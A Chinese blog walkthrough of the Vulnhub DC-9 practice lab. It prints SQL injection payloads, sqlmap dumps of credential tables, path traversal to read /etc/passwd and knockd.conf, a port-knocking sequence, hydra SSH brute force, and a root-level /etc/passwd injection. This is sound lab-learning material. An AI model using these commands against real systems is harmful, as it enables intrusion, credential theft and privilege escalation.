Vulnhub靶场DC-9练习

已于 2024-08-05 17:12:11 修改
阅读量1.3k 收藏 24
点赞数 29
分类专栏: Vulnhub靶场 web安全学习 Linux 文章标签: 渗透测试 网络安全 web安全 sql注入 提权 Linux vulnhub
于 2024-08-02 18:27:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39762423/article/details/140877482
版权

目录



0x00 准备


下载链接:https://download.vulnhub.com/dc/DC-9.zip

介绍:The ultimate goal of this challenge is to get root and to read the one and only flag。只有一个flag。



0x01 主机信息收集


kali查询本机ip,执行命令:ifconfig

kali本机ip:192.168.22.48

探测目标主机ip,执行命令:netdiscover -i eth0 -r 192.168.22.0/24

目标主机ip:192.168.22.14

探测目标主机开放端口,执行命令:nmap -sV -p 1-65535 -A 192.168.22.14

开放了22端口(filtered ssh表示被过滤了),ssh服务;80端口,http服务,Apache2.4.38。

在这里插入图片描述




0x02 站点信息收集


访问站点:http://192.168.22.14

探测站点的目录结构,执行命令:dirsearch -u 192.168.22.14

在这里插入图片描述




0x03 漏洞查找与利用


1. 发现SQL注入点


在search.php页面,可以提交数据进行查询,并返回查询的结果。

在这里插入图片描述


在manage.php页面可以提交用户名和密码进行登录。

在这里插入图片描述



综合上面两点,考虑在search页面试一下有没有SQL注入。

在search页面,http://192.168.22.14/search.php 提交查询的内容后,查询的结果显示在 http://192.168.22.14/results.php ,考虑是post方式,查询的数据在请求体中。抓包确认一下。

在这里插入图片描述


这里查询可以输入用户名之类的,所以考虑是字符型注入,重点是单引号闭合和注释多余的代码。构造语句:1‘ or 1=1 # ,预期的结果是查询出所有内容。在Display All Records页面,可以看到有17条记录,是所有的内容。

在search页面提交构造的语句:1‘ or 1=1 #

返回的结果是17条记录,说明查询成功。说明这里存在SQL注入。



2. Sqlmap跑数据


这里是POST方式,所以需要使用 -data 来指定参数。

确定是否存在注入,执行语句:sqlmap -u http://192.168.22.14/results.php --data “search=1”

确定是有注入的,并且数据是Mysql。

在这里插入图片描述


获取数据库名:sqlmap -u http://192.168.22.14/results.php --data “search=1” --dbs

有三个数据库:Staff,users,information_schema

在这里插入图片描述


确定当前链接的数据库名:sqlmap -u http://192.168.22.14/results.php --data “search=1” --current-db

当前的数据库是Staff。

在这里插入图片描述



获取Staff数据库的所有表名:sqlmap -u http://192.168.22.14/results.php --data “search=1” -D Staff --tables

有两个表:StaffDetails,Users

在这里插入图片描述


获取Staff数据库,Users表的所有字段名:sqlmap -u http://192.168.22.14/results.php --data “search=1” -D Staff -T Users --columns

有三个字段:Password,UserID,Username

在这里插入图片描述


这三个字段看起来都有点用,直接获取这个表的全部内容:sqlmap -u http://192.168.22.14/results.php --data “search=1” -D Staff -T Users --dump

在这里插入图片描述


admin用户的密码:856f5de590ef37314e7c3bdf6f8a66dc

是一个32位的数字和字母混合起来的密码,考虑MD5加密。

丢到网站里解密:https://www.somd5.com/

解密结果:transorbital1



3. 文件包含


回到站点的Manage页面,用上面的用户名和密码登录。

在这里插入图片描述


其他的页面跟登录前没什么区别,多了Add Record,是一个插入数据的地方。

但是在welcome.php页面这里有个文件不存在的提示。考虑文件包含。

构造:http://192.168.22.14/manage.php?file=/etc/passwd ,页面没有变化。

在路径前面加 ../ ,直到可以回显。

构造:http://192.168.22.14/manage.php?file=../../../../etc/passwd

可以看到passwd文件的内容。

在这里插入图片描述


可以看到很多的用户名。想到之前获取数据库表的时候,还有个users数据库。

获取这个数据库的表:sqlmap -u http://192.168.22.14/results.php --data “search=1” -D users —tables

有个UserDetails表。

在这里插入图片描述


获取这个表的全部内容:sqlmap -u http://192.168.22.14/results.php --data “search=1” -D users -T UserDetails --dump

在这里插入图片描述


这个表里的username用户名在/etc/passwd里面都出现过。

把username和password分别保存到文件user.txt和passwd.txt中,保存的时候去掉每一行后面的空格还有最后的空白行。



4. SSH爆破+端口敲门服务


利用hydra进行ssh爆破,执行命令:hydra -L user.txt -P password.txt 192.168.22.14 ssh

提示目标主机的22端口连不上。

在这里插入图片描述



前面进行端口探测的时候,22端口是过滤的。


考虑端口敲门服务,即knockd服务。简单来说,就是Linux系统其实开启了某个服务端口,但是knockd服务通过动态的添加iptables规则来隐藏系统开启的服务。需要使用自定义的一系列序列号来“敲门”,使被隐藏的服务可以对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

Linux 的 Port Knocking 端口碰撞(端口敲门)

kncoked服务的配置文件是 /etc/knockd.conf ,在这个文件中指明了需要的序列号sequence。

前面文件包含的地方可以查看系统文件,访问:[http://192.168.22.14/manage.php?file=../../../../etc/](http://192.168.22.14/manage.php?file=../../../../etc/passwd)knockd.conf

可以看到用来openssh的序列号是:7469,8475,9842

在这里插入图片描述


执行敲门命令开启22端口:knock 192.168.22.14 7469 8475 9842

执行完以后再看一下目标主机的开放端口,22开启了。(可以和最开始nmap的结果进行对比)

在这里插入图片描述



再来用hydra爆破ssh:hydra -L user.txt -P password.txt 192.168.22.14 ssh

可以看到有三个用户。

在这里插入图片描述


分别ssh登录上这三个用户:ssh username@192.168.22.14

在家目录下分别执行:ls -a (列出目录下的所有文件,包括以 . 开头的隐含文件)

在janitor用户下发现多了一个 .secrets-for-putin 。

查看一下内容,发现了几个密码。

在这里插入图片描述


将这几个密码放到前面保存的密码文件password.txt中,重新用hydra进行ssh爆破:hydra -L user.txt -P password.txt ssh://192.168.22.14

可以看到多了一个用户被破解出来。

在这里插入图片描述


再登录一下这个新用户:ssh fredf@192.168.22.14



5. 提权(写入/etc/passwd)


查看可以进行提权的利用点:sudo -l

这里有个test文件可以以root身份执行。

在这里插入图片描述


进入这个目录:cd /opt/devstuff/dist/test

执行test文件:./test

在这里插入图片描述


这个文件的使用和test.py有关。查找一下这个文件在哪:find / -name test.py 2>/dev/null

在这里插入图片描述


查看这个脚本的内容:cat /opt/devstuff/test.py

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()


这个脚本的作用就是将第一个参数的内容读取出来,添加到第二个参数中。这两个参数是文件的路径名字。

可以考虑给/etc/passwd写入一个具有root权限的用户,用户名为admin,密码为123456。

所以构造一条/etc/passwd的内容保存在一个文件中,利用test命令写入到/etc/passwd文件中。

/etc/passwd的文件结构:

用户名:密码hash值:uid:gid:描述性信息:home目录:默认shell 

其中,uid=gid=0为超级用户,默认shell一般为/bin/bash。


(一开始构造了一个不需要密码的超级用户:hack::0:0::/root:/bin/bash ,结果切换用户登录的时候提示输入密码,所以重新构造一个需要密码的超级用户。用户名为dcdc,密码为123456。)

先用openssl生成admin用户的加密密码:openssl passwd -1 -salt dcdc 123456

得到加密的密码:$1$dcdc$G.vOXHYFS0/R76Ag9eTy/1

在这里插入图片描述


构造要插入的内容:dcdc:$1$dcdc$G.vOXHYFS0/R76Ag9eTy/1:0:0::/root:/bin/bash

Linux中/tmp目录是任何用户都可以写的。

将构造的数据写入/tmp/admin中:echo 'dcdc:$1$dcdc$G.vOXHYFS0/R76Ag9eTy/1:0:0::/root:/bin/bash' > /tmp/dcdc

再将构造的用户利用test写入passwd文件中:sudo /opt/devstuff/dist/test/test /tmp/dcdc /etc/passwd

看一下/etc/passwd文件的内容,可以看到写入成功。

在这里插入图片描述


切换到用户dcdc,进入/root目录,成功。

在这里插入图片描述


0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放端口和服务。(22端口被过滤)

站点信息收集:

  1. dirsearch扫描站点的目录结构。
  2. 寻找sql注入点,确定注入类型。

漏洞利用:

  1. sqlmap跑数据库,获取登录的用户名和密码。
  2. 发现文件包含。
  3. hydra爆破ssh。
  4. knock服务开启22端口。
  5. 提权,将新用户写入/etc/passwd。



RrEeSsEeTt
关注
  • 29
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2947
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
Vulnhub靶场练习 DC-1
m0_64227134的博客
04-23 540
Vulnhub 靶场练习 DC-1
Vulnhub靶场-DC-2靶机练习
qq_44877412的博客
01-20 434
Vulnhub-DC-2 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-2 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、信息收集 1、主机存活扫描 arp-scan -l 2、端口扫描 nmap -A -p- 192.168.143.135 发现开放的端口以及服务 80 wordpress 7744 ssh 3、脚本扫描 nmap --script
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1646
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶场DC-5练习
Reset
07-04 996
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。利用burpsuite的Intruder模块,爆破文件包含的参数。利用文件包含,进行nginx日志挂马。反弹shell。screen4.5.0漏洞利用。
Vulnhub靶场DC-6练习
Reset
07-08 1011
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权
Vulnhub靶场DC-7练习
最新发布
Reset
07-19 1727
netdiscover探测目标主机ip。nmap探测开放端口和服务。根据提示找到配置文件,获取用户名密码。ssh连接目标主机。drush修改Drupal密码。Drupal写入php木马。蚁剑连接shell。反弹shell。提权
Vulnhub-DC-3靶场练习
qq_44877412的博客
01-20 999
Vulnhub-DC-3 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-3 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 可能会遇到如下报错: IDE设备(磁盘/CD-ROM)配置不正确。"ide0:1"上具有一个IDE从设备, 但没有主设备。此配置在虚拟机中无法正常运行。 请使用配置编辑器将磁盘/CD-ROM 从"ide0:1"移到"ide0:0”。 解决办法
Vulnhub靶场DC-4练习
Reset
06-25 909
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。利用burpsuite的Intruder模块,弱口令爆破站点的登录密码。命令执行,反弹shell。hydra爆破ssh。teehee提权
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2081
vulnhub靶场渗透练习详解——DC9
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2980
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2781
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3637
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
kali2.0第一次启动msf
Reset
04-16 9495
msf即Metasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具。 第一次使用msf: ①、先启动postgresql数据库,这个是msf 的默认数据库。 service postgresql start 或者 /etc/init.d/postgresql start ②、第一次用所以需要初始化数据库 postgresql enable ③、...
HTTP请求以及burp使用
Reset
10-17 8440
一、使用burp的时候需要设置代理(代理作为客户端和服务器的中间者,在利用http协议交互时,所有的请求和回应都不会直接发送给目标而是右代理接收和转发),还有安装证书。我使用的时候出现了一个问题,就是在burp里面设置代理的时候无法勾选127.0.0.1:8080,即下图中不能出现那个√。此时就应该考虑是端口占用问题,所以端口占用是一个非常不起眼但是又非常常见的问题,phpstudy中也经常出现端...
xss源代码练习(一)
Reset
11-27 4690
Xss练习代码 1. <script>alert(/xss/)</script>       2. 有两个地方输出,第一个是php中的恶臭,做了过滤,第二个是input标签中没有过滤,于是在input标签中插入payload (1)还在input里面,添加事件 移动下鼠标即可触发payload为:    " onmouseover="alert...
认识一些kali和linux命令
Reset
10-15 4051
1.ps命令:查进程,参数如下:   ps a 显示现行终端机下的所有程序(其他用户的程序)。   ps u 以用户为主的格式来显示程序状况。   ps x 显示所有程序(自己的进程)。   ps -A 显示所有程序。   ps c 列出程序时,显示每个程序真正的指令名称,而不包含路径,参数或常驻服务的标示。   ps -e 此参数的效果和指定"A"参数相同。   ps e 列出程序...
XSS靶场练习 https://xss.haozi.me
Reset
05-07 3451
https://xss.haozi.me 找到输入内容的输出点,确定是在html中还是js中。 0x00 function render (input) { return '<div>' + input + '</div>' } 在标签内且无过滤。 <script>alert(1)</script> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值